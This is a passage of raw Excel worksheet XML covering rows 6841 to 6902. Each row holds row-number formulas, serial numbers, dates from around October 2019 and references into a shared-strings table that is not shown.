      <c r="D6841" s="1">
        <v>43756</v>
      </c>
      <c r="E6841" t="s">
        <v>13489</v>
      </c>
      <c r="F6841" t="s">
        <v>9975</v>
      </c>
      <c r="G6841" t="s">
        <v>13490</v>
      </c>
    </row>
    <row r="6842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6842">
        <f t="shared" si="106"/>
        <v>6841</v>
      </c>
      <c r="B6842">
        <v>1841</v>
      </c>
      <c r="C6842" t="s">
        <v>9973</v>
      </c>
      <c r="D6842" s="1">
        <v>43743</v>
      </c>
      <c r="E6842" t="s">
        <v>13491</v>
      </c>
      <c r="F6842" t="s">
        <v>9975</v>
      </c>
      <c r="G6842" t="s">
        <v>13492</v>
      </c>
    </row>
    <row r="6843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6843">
        <f t="shared" si="106"/>
        <v>6842</v>
      </c>
      <c r="B6843">
        <v>1842</v>
      </c>
      <c r="C6843" t="s">
        <v>9973</v>
      </c>
      <c r="D6843" s="1">
        <v>43753</v>
      </c>
      <c r="E6843" t="s">
        <v>10018</v>
      </c>
      <c r="F6843" t="s">
        <v>9975</v>
      </c>
      <c r="G6843" t="s">
        <v>13493</v>
      </c>
    </row>
    <row r="6844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6844">
        <f t="shared" si="106"/>
        <v>6843</v>
      </c>
      <c r="B6844">
        <v>1843</v>
      </c>
      <c r="C6844" t="s">
        <v>9973</v>
      </c>
      <c r="D6844" s="1">
        <v>43744</v>
      </c>
      <c r="E6844" t="s">
        <v>13494</v>
      </c>
      <c r="F6844" t="s">
        <v>9975</v>
      </c>
      <c r="G6844" t="s">
        <v>13495</v>
      </c>
    </row>
    <row r="6845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6845">
        <f t="shared" si="106"/>
        <v>6844</v>
      </c>
      <c r="B6845">
        <v>1844</v>
      </c>
      <c r="C6845" t="s">
        <v>9973</v>
      </c>
      <c r="D6845" s="1">
        <v>43752</v>
      </c>
      <c r="E6845" t="s">
        <v>13496</v>
      </c>
      <c r="F6845" t="s">
        <v>9975</v>
      </c>
      <c r="G6845" t="s">
        <v>13497</v>
      </c>
    </row>
    <row r="6846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6846">
        <f t="shared" si="106"/>
        <v>6845</v>
      </c>
      <c r="B6846">
        <v>1845</v>
      </c>
      <c r="C6846" t="s">
        <v>9973</v>
      </c>
      <c r="D6846" s="1">
        <v>43756</v>
      </c>
      <c r="E6846" t="s">
        <v>13498</v>
      </c>
      <c r="F6846" t="s">
        <v>9975</v>
      </c>
      <c r="G6846" t="s">
        <v>13499</v>
      </c>
    </row>
    <row r="6847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6847">
        <f t="shared" si="106"/>
        <v>6846</v>
      </c>
      <c r="B6847">
        <v>1846</v>
      </c>
      <c r="C6847" t="s">
        <v>9973</v>
      </c>
      <c r="D6847" s="1">
        <v>43745</v>
      </c>
      <c r="E6847" t="s">
        <v>13500</v>
      </c>
      <c r="F6847" t="s">
        <v>9975</v>
      </c>
      <c r="G6847" t="s">
        <v>13501</v>
      </c>
    </row>
    <row r="6848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6848">
        <f t="shared" si="106"/>
        <v>6847</v>
      </c>
      <c r="B6848">
        <v>1847</v>
      </c>
      <c r="C6848" t="s">
        <v>9973</v>
      </c>
      <c r="D6848" s="1">
        <v>43748</v>
      </c>
      <c r="E6848" t="s">
        <v>13502</v>
      </c>
      <c r="F6848" t="s">
        <v>9975</v>
      </c>
      <c r="G6848" t="s">
        <v>13503</v>
      </c>
    </row>
    <row r="6849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6849">
        <f t="shared" si="106"/>
        <v>6848</v>
      </c>
      <c r="B6849">
        <v>1848</v>
      </c>
      <c r="C6849" t="s">
        <v>9973</v>
      </c>
      <c r="D6849" s="1">
        <v>43741</v>
      </c>
      <c r="E6849" t="s">
        <v>13504</v>
      </c>
      <c r="F6849" t="s">
        <v>9975</v>
      </c>
      <c r="G6849" t="s">
        <v>13505</v>
      </c>
    </row>
    <row r="6850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6850">
        <f t="shared" si="106"/>
        <v>6849</v>
      </c>
      <c r="B6850">
        <v>1849</v>
      </c>
      <c r="C6850" t="s">
        <v>9973</v>
      </c>
      <c r="D6850" s="1">
        <v>43757</v>
      </c>
      <c r="E6850" t="s">
        <v>13506</v>
      </c>
      <c r="F6850" t="s">
        <v>9975</v>
      </c>
      <c r="G6850" t="s">
        <v>13507</v>
      </c>
    </row>
    <row r="6851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6851">
        <f t="shared" ref="A6851:A6914" si="107">+ROW(A6850)</f>
        <v>6850</v>
      </c>
      <c r="B6851">
        <v>1850</v>
      </c>
      <c r="C6851" t="s">
        <v>9973</v>
      </c>
      <c r="D6851" s="1">
        <v>43753</v>
      </c>
      <c r="E6851" t="s">
        <v>13508</v>
      </c>
      <c r="F6851" t="s">
        <v>9975</v>
      </c>
      <c r="G6851" t="s">
        <v>13509</v>
      </c>
    </row>
    <row r="6852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6852">
        <f t="shared" si="107"/>
        <v>6851</v>
      </c>
      <c r="B6852">
        <v>1851</v>
      </c>
      <c r="C6852" t="s">
        <v>9973</v>
      </c>
      <c r="D6852" s="1">
        <v>43753</v>
      </c>
      <c r="E6852" t="s">
        <v>13510</v>
      </c>
      <c r="F6852" t="s">
        <v>9975</v>
      </c>
      <c r="G6852" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="6853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6853">
        <f t="shared" si="107"/>
        <v>6852</v>
      </c>
      <c r="B6853">
        <v>1852</v>
      </c>
      <c r="C6853" t="s">
        <v>9973</v>
      </c>
      <c r="D6853" s="1">
        <v>43757</v>
      </c>
      <c r="E6853" t="s">
        <v>13512</v>
      </c>
      <c r="F6853" t="s">
        <v>9975</v>
      </c>
      <c r="G6853" t="s">
        <v>13513</v>
      </c>
    </row>
    <row r="6854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6854">
        <f t="shared" si="107"/>
        <v>6853</v>
      </c>
      <c r="B6854">
        <v>1853</v>
      </c>
      <c r="C6854" t="s">
        <v>9973</v>
      </c>
      <c r="D6854" s="1">
        <v>43749</v>
      </c>
      <c r="E6854" t="s">
        <v>13514</v>
      </c>
      <c r="F6854" t="s">
        <v>9978</v>
      </c>
      <c r="G6854" t="s">
        <v>13515</v>
      </c>
    </row>
    <row r="6855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6855">
        <f t="shared" si="107"/>
        <v>6854</v>
      </c>
      <c r="B6855">
        <v>1854</v>
      </c>
      <c r="C6855" t="s">
        <v>9973</v>
      </c>
      <c r="D6855" s="1">
        <v>43745</v>
      </c>
      <c r="E6855" t="s">
        <v>13516</v>
      </c>
      <c r="F6855" t="s">
        <v>9975</v>
      </c>
      <c r="G6855" t="s">
        <v>13517</v>
      </c>
    </row>
    <row r="6856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6856">
        <f t="shared" si="107"/>
        <v>6855</v>
      </c>
      <c r="B6856">
        <v>1855</v>
      </c>
      <c r="C6856" t="s">
        <v>9973</v>
      </c>
      <c r="D6856" s="1">
        <v>43744</v>
      </c>
      <c r="E6856" t="s">
        <v>13518</v>
      </c>
      <c r="F6856" t="s">
        <v>9975</v>
      </c>
      <c r="G6856" t="s">
        <v>13519</v>
      </c>
    </row>
    <row r="6857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6857">
        <f t="shared" si="107"/>
        <v>6856</v>
      </c>
      <c r="B6857">
        <v>1856</v>
      </c>
      <c r="C6857" t="s">
        <v>9973</v>
      </c>
      <c r="D6857" s="1">
        <v>43744</v>
      </c>
      <c r="E6857" t="s">
        <v>13520</v>
      </c>
      <c r="F6857" t="s">
        <v>9975</v>
      </c>
      <c r="G6857" t="s">
        <v>13521</v>
      </c>
    </row>
    <row r="6858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6858">
        <f t="shared" si="107"/>
        <v>6857</v>
      </c>
      <c r="B6858">
        <v>1857</v>
      </c>
      <c r="C6858" t="s">
        <v>9973</v>
      </c>
      <c r="D6858" s="1">
        <v>43740</v>
      </c>
      <c r="E6858" t="s">
        <v>13522</v>
      </c>
      <c r="F6858" t="s">
        <v>9975</v>
      </c>
      <c r="G6858" t="s">
        <v>13523</v>
      </c>
    </row>
    <row r="6859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6859">
        <f t="shared" si="107"/>
        <v>6858</v>
      </c>
      <c r="B6859">
        <v>1858</v>
      </c>
      <c r="C6859" t="s">
        <v>9973</v>
      </c>
      <c r="D6859" s="1">
        <v>43741</v>
      </c>
      <c r="E6859" t="s">
        <v>13524</v>
      </c>
      <c r="F6859" t="s">
        <v>9975</v>
      </c>
      <c r="G6859" t="s">
        <v>13525</v>
      </c>
    </row>
    <row r="6860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6860">
        <f t="shared" si="107"/>
        <v>6859</v>
      </c>
      <c r="B6860">
        <v>1859</v>
      </c>
      <c r="C6860" t="s">
        <v>9973</v>
      </c>
      <c r="D6860" s="1">
        <v>43755</v>
      </c>
      <c r="E6860" t="s">
        <v>10018</v>
      </c>
      <c r="F6860" t="s">
        <v>9975</v>
      </c>
      <c r="G6860" t="s">
        <v>13486</v>
      </c>
    </row>
    <row r="6861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6861">
        <f t="shared" si="107"/>
        <v>6860</v>
      </c>
      <c r="B6861">
        <v>1860</v>
      </c>
      <c r="C6861" t="s">
        <v>9973</v>
      </c>
      <c r="D6861" s="1">
        <v>43747</v>
      </c>
      <c r="E6861" t="s">
        <v>13526</v>
      </c>
      <c r="F6861" t="s">
        <v>9975</v>
      </c>
      <c r="G6861" t="s">
        <v>13527</v>
      </c>
    </row>
    <row r="6862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6862">
        <f t="shared" si="107"/>
        <v>6861</v>
      </c>
      <c r="B6862">
        <v>1861</v>
      </c>
      <c r="C6862" t="s">
        <v>9973</v>
      </c>
      <c r="D6862" s="1">
        <v>43740</v>
      </c>
      <c r="E6862" t="s">
        <v>13528</v>
      </c>
      <c r="F6862" t="s">
        <v>9975</v>
      </c>
      <c r="G6862" t="s">
        <v>13529</v>
      </c>
    </row>
    <row r="6863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6863">
        <f t="shared" si="107"/>
        <v>6862</v>
      </c>
      <c r="B6863">
        <v>1862</v>
      </c>
      <c r="C6863" t="s">
        <v>9973</v>
      </c>
      <c r="D6863" s="1">
        <v>43754</v>
      </c>
      <c r="E6863" t="s">
        <v>13530</v>
      </c>
      <c r="F6863" t="s">
        <v>9975</v>
      </c>
      <c r="G6863" t="s">
        <v>13531</v>
      </c>
    </row>
    <row r="6864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6864">
        <f t="shared" si="107"/>
        <v>6863</v>
      </c>
      <c r="B6864">
        <v>1863</v>
      </c>
      <c r="C6864" t="s">
        <v>9973</v>
      </c>
      <c r="D6864" s="1">
        <v>43747</v>
      </c>
      <c r="E6864" t="s">
        <v>13532</v>
      </c>
      <c r="F6864" t="s">
        <v>9975</v>
      </c>
      <c r="G6864" t="s">
        <v>13533</v>
      </c>
    </row>
    <row r="6865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6865">
        <f t="shared" si="107"/>
        <v>6864</v>
      </c>
      <c r="B6865">
        <v>1864</v>
      </c>
      <c r="C6865" t="s">
        <v>9973</v>
      </c>
      <c r="D6865" s="1">
        <v>43753</v>
      </c>
      <c r="E6865" t="s">
        <v>13534</v>
      </c>
      <c r="F6865" t="s">
        <v>9975</v>
      </c>
      <c r="G6865" t="s">
        <v>13535</v>
      </c>
    </row>
    <row r="6866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6866">
        <f t="shared" si="107"/>
        <v>6865</v>
      </c>
      <c r="B6866">
        <v>1865</v>
      </c>
      <c r="C6866" t="s">
        <v>9973</v>
      </c>
      <c r="D6866" s="1">
        <v>43752</v>
      </c>
      <c r="E6866" t="s">
        <v>13536</v>
      </c>
      <c r="F6866" t="s">
        <v>9975</v>
      </c>
      <c r="G6866" t="s">
        <v>13537</v>
      </c>
    </row>
    <row r="6867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6867">
        <f t="shared" si="107"/>
        <v>6866</v>
      </c>
      <c r="B6867">
        <v>1866</v>
      </c>
      <c r="C6867" t="s">
        <v>9973</v>
      </c>
      <c r="D6867" s="1">
        <v>43741</v>
      </c>
      <c r="E6867" t="s">
        <v>13538</v>
      </c>
      <c r="F6867" t="s">
        <v>9975</v>
      </c>
      <c r="G6867" t="s">
        <v>13539</v>
      </c>
    </row>
    <row r="6868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6868">
        <f t="shared" si="107"/>
        <v>6867</v>
      </c>
      <c r="B6868">
        <v>1867</v>
      </c>
      <c r="C6868" t="s">
        <v>9973</v>
      </c>
      <c r="D6868" s="1">
        <v>43742</v>
      </c>
      <c r="E6868" t="s">
        <v>13540</v>
      </c>
      <c r="F6868" t="s">
        <v>9975</v>
      </c>
      <c r="G6868" t="s">
        <v>13541</v>
      </c>
    </row>
    <row r="6869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6869">
        <f t="shared" si="107"/>
        <v>6868</v>
      </c>
      <c r="B6869">
        <v>1868</v>
      </c>
      <c r="C6869" t="s">
        <v>9973</v>
      </c>
      <c r="D6869" s="1">
        <v>43739</v>
      </c>
      <c r="E6869" t="s">
        <v>13542</v>
      </c>
      <c r="F6869" t="s">
        <v>9975</v>
      </c>
      <c r="G6869" t="s">
        <v>13543</v>
      </c>
    </row>
    <row r="6870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6870">
        <f t="shared" si="107"/>
        <v>6869</v>
      </c>
      <c r="B6870">
        <v>1869</v>
      </c>
      <c r="C6870" t="s">
        <v>9973</v>
      </c>
      <c r="D6870" s="1">
        <v>43740</v>
      </c>
      <c r="E6870" t="s">
        <v>13544</v>
      </c>
      <c r="F6870" t="s">
        <v>9975</v>
      </c>
      <c r="G6870" t="s">
        <v>13545</v>
      </c>
    </row>
    <row r="6871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6871">
        <f t="shared" si="107"/>
        <v>6870</v>
      </c>
      <c r="B6871">
        <v>1870</v>
      </c>
      <c r="C6871" t="s">
        <v>9973</v>
      </c>
      <c r="D6871" s="1">
        <v>43756</v>
      </c>
      <c r="E6871" t="s">
        <v>13546</v>
      </c>
      <c r="F6871" t="s">
        <v>9975</v>
      </c>
      <c r="G6871" t="s">
        <v>13547</v>
      </c>
    </row>
    <row r="6872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6872">
        <f t="shared" si="107"/>
        <v>6871</v>
      </c>
      <c r="B6872">
        <v>1871</v>
      </c>
      <c r="C6872" t="s">
        <v>9973</v>
      </c>
      <c r="D6872" s="1">
        <v>43743</v>
      </c>
      <c r="E6872" t="s">
        <v>13548</v>
      </c>
      <c r="F6872" t="s">
        <v>9975</v>
      </c>
      <c r="G6872" t="s">
        <v>13549</v>
      </c>
    </row>
    <row r="6873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6873">
        <f t="shared" si="107"/>
        <v>6872</v>
      </c>
      <c r="B6873">
        <v>1872</v>
      </c>
      <c r="C6873" t="s">
        <v>9973</v>
      </c>
      <c r="D6873" s="1">
        <v>43756</v>
      </c>
      <c r="E6873" t="s">
        <v>13550</v>
      </c>
      <c r="F6873" t="s">
        <v>10526</v>
      </c>
      <c r="G6873" t="s">
        <v>13551</v>
      </c>
    </row>
    <row r="6874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6874">
        <f t="shared" si="107"/>
        <v>6873</v>
      </c>
      <c r="B6874">
        <v>1873</v>
      </c>
      <c r="C6874" t="s">
        <v>9973</v>
      </c>
      <c r="D6874" s="1">
        <v>43741</v>
      </c>
      <c r="E6874" t="s">
        <v>13552</v>
      </c>
      <c r="F6874" t="s">
        <v>9975</v>
      </c>
      <c r="G6874" t="s">
        <v>13553</v>
      </c>
    </row>
    <row r="6875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6875">
        <f t="shared" si="107"/>
        <v>6874</v>
      </c>
      <c r="B6875">
        <v>1874</v>
      </c>
      <c r="C6875" t="s">
        <v>9973</v>
      </c>
      <c r="D6875" s="1">
        <v>43741</v>
      </c>
      <c r="E6875" t="s">
        <v>13554</v>
      </c>
      <c r="F6875" t="s">
        <v>9975</v>
      </c>
      <c r="G6875" t="s">
        <v>13555</v>
      </c>
    </row>
    <row r="6876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6876">
        <f t="shared" si="107"/>
        <v>6875</v>
      </c>
      <c r="B6876">
        <v>1875</v>
      </c>
      <c r="C6876" t="s">
        <v>9973</v>
      </c>
      <c r="D6876" s="1">
        <v>43750</v>
      </c>
      <c r="E6876" t="s">
        <v>13556</v>
      </c>
      <c r="F6876" t="s">
        <v>9975</v>
      </c>
      <c r="G6876" t="s">
        <v>13557</v>
      </c>
    </row>
    <row r="6877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6877">
        <f t="shared" si="107"/>
        <v>6876</v>
      </c>
      <c r="B6877">
        <v>1876</v>
      </c>
      <c r="C6877" t="s">
        <v>9973</v>
      </c>
      <c r="D6877" s="1">
        <v>43739</v>
      </c>
      <c r="E6877" t="s">
        <v>13558</v>
      </c>
      <c r="F6877" t="s">
        <v>9975</v>
      </c>
      <c r="G6877" t="s">
        <v>13559</v>
      </c>
    </row>
    <row r="6878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6878">
        <f t="shared" si="107"/>
        <v>6877</v>
      </c>
      <c r="B6878">
        <v>1877</v>
      </c>
      <c r="C6878" t="s">
        <v>9973</v>
      </c>
      <c r="D6878" s="1">
        <v>43744</v>
      </c>
      <c r="E6878" t="s">
        <v>13560</v>
      </c>
      <c r="F6878" t="s">
        <v>9975</v>
      </c>
      <c r="G6878" t="s">
        <v>13561</v>
      </c>
    </row>
    <row r="6879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6879">
        <f t="shared" si="107"/>
        <v>6878</v>
      </c>
      <c r="B6879">
        <v>1878</v>
      </c>
      <c r="C6879" t="s">
        <v>9973</v>
      </c>
      <c r="D6879" s="1">
        <v>43740</v>
      </c>
      <c r="E6879" t="s">
        <v>13562</v>
      </c>
      <c r="F6879" t="s">
        <v>9975</v>
      </c>
      <c r="G6879" t="s">
        <v>13563</v>
      </c>
    </row>
    <row r="6880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6880">
        <f t="shared" si="107"/>
        <v>6879</v>
      </c>
      <c r="B6880">
        <v>1879</v>
      </c>
      <c r="C6880" t="s">
        <v>9973</v>
      </c>
      <c r="D6880" s="1">
        <v>43745</v>
      </c>
      <c r="E6880" t="s">
        <v>13564</v>
      </c>
      <c r="F6880" t="s">
        <v>9975</v>
      </c>
      <c r="G6880" t="s">
        <v>13565</v>
      </c>
    </row>
    <row r="6881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6881">
        <f t="shared" si="107"/>
        <v>6880</v>
      </c>
      <c r="B6881">
        <v>1880</v>
      </c>
      <c r="C6881" t="s">
        <v>9973</v>
      </c>
      <c r="D6881" s="1">
        <v>43746</v>
      </c>
      <c r="E6881" t="s">
        <v>13566</v>
      </c>
      <c r="F6881" t="s">
        <v>9975</v>
      </c>
      <c r="G6881" t="s">
        <v>13567</v>
      </c>
    </row>
    <row r="6882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6882">
        <f t="shared" si="107"/>
        <v>6881</v>
      </c>
      <c r="B6882">
        <v>1881</v>
      </c>
      <c r="C6882" t="s">
        <v>9973</v>
      </c>
      <c r="D6882" s="1">
        <v>43742</v>
      </c>
      <c r="E6882" t="s">
        <v>13568</v>
      </c>
      <c r="F6882" t="s">
        <v>9975</v>
      </c>
      <c r="G6882" t="s">
        <v>13569</v>
      </c>
    </row>
    <row r="6883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6883">
        <f t="shared" si="107"/>
        <v>6882</v>
      </c>
      <c r="B6883">
        <v>1882</v>
      </c>
      <c r="C6883" t="s">
        <v>9973</v>
      </c>
      <c r="D6883" s="1">
        <v>43741</v>
      </c>
      <c r="E6883" t="s">
        <v>13570</v>
      </c>
      <c r="F6883" t="s">
        <v>9975</v>
      </c>
      <c r="G6883" t="s">
        <v>13571</v>
      </c>
    </row>
    <row r="6884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6884">
        <f t="shared" si="107"/>
        <v>6883</v>
      </c>
      <c r="B6884">
        <v>1883</v>
      </c>
      <c r="C6884" t="s">
        <v>9973</v>
      </c>
      <c r="D6884" s="1">
        <v>43747</v>
      </c>
      <c r="E6884" t="s">
        <v>13572</v>
      </c>
      <c r="F6884" t="s">
        <v>9975</v>
      </c>
      <c r="G6884" t="s">
        <v>13573</v>
      </c>
    </row>
    <row r="6885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6885">
        <f t="shared" si="107"/>
        <v>6884</v>
      </c>
      <c r="B6885">
        <v>1884</v>
      </c>
      <c r="C6885" t="s">
        <v>9973</v>
      </c>
      <c r="D6885" s="1">
        <v>43756</v>
      </c>
      <c r="E6885" t="s">
        <v>13574</v>
      </c>
      <c r="F6885" t="s">
        <v>9975</v>
      </c>
      <c r="G6885" t="s">
        <v>13575</v>
      </c>
    </row>
    <row r="6886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6886">
        <f t="shared" si="107"/>
        <v>6885</v>
      </c>
      <c r="B6886">
        <v>1885</v>
      </c>
      <c r="C6886" t="s">
        <v>9973</v>
      </c>
      <c r="D6886" s="1">
        <v>43749</v>
      </c>
      <c r="E6886" t="s">
        <v>13576</v>
      </c>
      <c r="F6886" t="s">
        <v>10526</v>
      </c>
      <c r="G6886" t="s">
        <v>13577</v>
      </c>
    </row>
    <row r="6887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6887">
        <f t="shared" si="107"/>
        <v>6886</v>
      </c>
      <c r="B6887">
        <v>1886</v>
      </c>
      <c r="C6887" t="s">
        <v>9973</v>
      </c>
      <c r="D6887" s="1">
        <v>43756</v>
      </c>
      <c r="E6887" t="s">
        <v>13578</v>
      </c>
      <c r="F6887" t="s">
        <v>9975</v>
      </c>
      <c r="G6887" t="s">
        <v>13579</v>
      </c>
    </row>
    <row r="6888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6888">
        <f t="shared" si="107"/>
        <v>6887</v>
      </c>
      <c r="B6888">
        <v>1887</v>
      </c>
      <c r="C6888" t="s">
        <v>9973</v>
      </c>
      <c r="D6888" s="1">
        <v>43757</v>
      </c>
      <c r="E6888" t="s">
        <v>13580</v>
      </c>
      <c r="F6888" t="s">
        <v>9975</v>
      </c>
      <c r="G6888" t="s">
        <v>13581</v>
      </c>
    </row>
    <row r="6889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6889">
        <f t="shared" si="107"/>
        <v>6888</v>
      </c>
      <c r="B6889">
        <v>1888</v>
      </c>
      <c r="C6889" t="s">
        <v>9973</v>
      </c>
      <c r="D6889" s="1">
        <v>43738</v>
      </c>
      <c r="E6889" t="s">
        <v>13582</v>
      </c>
      <c r="F6889" t="s">
        <v>9975</v>
      </c>
      <c r="G6889" t="s">
        <v>13583</v>
      </c>
    </row>
    <row r="6890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6890">
        <f t="shared" si="107"/>
        <v>6889</v>
      </c>
      <c r="B6890">
        <v>1889</v>
      </c>
      <c r="C6890" t="s">
        <v>9973</v>
      </c>
      <c r="D6890" s="1">
        <v>43754</v>
      </c>
      <c r="E6890" t="s">
        <v>13584</v>
      </c>
      <c r="F6890" t="s">
        <v>9975</v>
      </c>
      <c r="G6890" t="s">
        <v>13585</v>
      </c>
    </row>
    <row r="6891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6891">
        <f t="shared" si="107"/>
        <v>6890</v>
      </c>
      <c r="B6891">
        <v>1890</v>
      </c>
      <c r="C6891" t="s">
        <v>9973</v>
      </c>
      <c r="D6891" s="1">
        <v>43752</v>
      </c>
      <c r="E6891" t="s">
        <v>13586</v>
      </c>
      <c r="F6891" t="s">
        <v>9975</v>
      </c>
      <c r="G6891" t="s">
        <v>13587</v>
      </c>
    </row>
    <row r="6892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6892">
        <f t="shared" si="107"/>
        <v>6891</v>
      </c>
      <c r="B6892">
        <v>1891</v>
      </c>
      <c r="C6892" t="s">
        <v>9973</v>
      </c>
      <c r="D6892" s="1">
        <v>43743</v>
      </c>
      <c r="E6892" t="s">
        <v>13588</v>
      </c>
      <c r="F6892" t="s">
        <v>9975</v>
      </c>
      <c r="G6892" t="s">
        <v>13589</v>
      </c>
    </row>
    <row r="6893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6893">
        <f t="shared" si="107"/>
        <v>6892</v>
      </c>
      <c r="B6893">
        <v>1892</v>
      </c>
      <c r="C6893" t="s">
        <v>9973</v>
      </c>
      <c r="D6893" s="1">
        <v>43741</v>
      </c>
      <c r="E6893" t="s">
        <v>10099</v>
      </c>
      <c r="F6893" t="s">
        <v>9975</v>
      </c>
      <c r="G6893" t="s">
        <v>13590</v>
      </c>
    </row>
    <row r="6894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6894">
        <f t="shared" si="107"/>
        <v>6893</v>
      </c>
      <c r="B6894">
        <v>1893</v>
      </c>
      <c r="C6894" t="s">
        <v>9973</v>
      </c>
      <c r="D6894" s="1">
        <v>43755</v>
      </c>
      <c r="E6894" t="s">
        <v>13591</v>
      </c>
      <c r="F6894" t="s">
        <v>9975</v>
      </c>
      <c r="G6894" t="s">
        <v>13592</v>
      </c>
    </row>
    <row r="6895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6895">
        <f t="shared" si="107"/>
        <v>6894</v>
      </c>
      <c r="B6895">
        <v>1894</v>
      </c>
      <c r="C6895" t="s">
        <v>9973</v>
      </c>
      <c r="D6895" s="1">
        <v>43745</v>
      </c>
      <c r="E6895" t="s">
        <v>13593</v>
      </c>
      <c r="F6895" t="s">
        <v>9975</v>
      </c>
      <c r="G6895" t="s">
        <v>13594</v>
      </c>
    </row>
    <row r="6896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6896">
        <f t="shared" si="107"/>
        <v>6895</v>
      </c>
      <c r="B6896">
        <v>1895</v>
      </c>
      <c r="C6896" t="s">
        <v>9973</v>
      </c>
      <c r="D6896" s="1">
        <v>43754</v>
      </c>
      <c r="E6896" t="s">
        <v>13595</v>
      </c>
      <c r="F6896" t="s">
        <v>9975</v>
      </c>
      <c r="G6896" t="s">
        <v>13596</v>
      </c>
    </row>
    <row r="6897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6897">
        <f t="shared" si="107"/>
        <v>6896</v>
      </c>
      <c r="B6897">
        <v>1896</v>
      </c>
      <c r="C6897" t="s">
        <v>9973</v>
      </c>
      <c r="D6897" s="1">
        <v>43753</v>
      </c>
      <c r="E6897" t="s">
        <v>13597</v>
      </c>
      <c r="F6897" t="s">
        <v>9975</v>
      </c>
      <c r="G6897" t="s">
        <v>13598</v>
      </c>
    </row>
    <row r="6898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6898">
        <f t="shared" si="107"/>
        <v>6897</v>
      </c>
      <c r="B6898">
        <v>1897</v>
      </c>
      <c r="C6898" t="s">
        <v>9973</v>
      </c>
      <c r="D6898" s="1">
        <v>43756</v>
      </c>
      <c r="E6898" t="s">
        <v>13599</v>
      </c>
      <c r="F6898" t="s">
        <v>9975</v>
      </c>
      <c r="G6898" t="s">
        <v>13600</v>
      </c>
    </row>
    <row r="6899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6899">
        <f t="shared" si="107"/>
        <v>6898</v>
      </c>
      <c r="B6899">
        <v>1898</v>
      </c>
      <c r="C6899" t="s">
        <v>9973</v>
      </c>
      <c r="D6899" s="1">
        <v>43738</v>
      </c>
      <c r="E6899" t="s">
        <v>13601</v>
      </c>
      <c r="F6899" t="s">
        <v>9975</v>
      </c>
      <c r="G6899" t="s">
        <v>13602</v>
      </c>
    </row>
    <row r="6900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6900">
        <f t="shared" si="107"/>
        <v>6899</v>
      </c>
      <c r="B6900">
        <v>1899</v>
      </c>
      <c r="C6900" t="s">
        <v>9973</v>
      </c>
      <c r="D6900" s="1">
        <v>43748</v>
      </c>
      <c r="E6900" t="s">
        <v>10099</v>
      </c>
      <c r="F6900" t="s">
        <v>9975</v>
      </c>
      <c r="G6900" t="s">
        <v>13603</v>
      </c>
    </row>
    <row r="6901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6901">
        <f t="shared" si="107"/>
        <v>6900</v>
      </c>
      <c r="B6901">
        <v>1900</v>
      </c>
      <c r="C6901" t="s">
        <v>9973</v>
      </c>
      <c r="D6901" s="1">
        <v>43748</v>
      </c>
      <c r="E6901" t="s">
        <v>13604</v>
      </c>
      <c r="F6901" t="s">
        <v>9975</v>
      </c>
      <c r="G6901" t="s">
        <v>13605</v>
      </c>
    </row>
    <row r="6902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6902">
        <f t="shared" si="107"/>
        <v>6901</v>
      </c>
      <c r="B6902">
        <v>1901</v>
      </c>
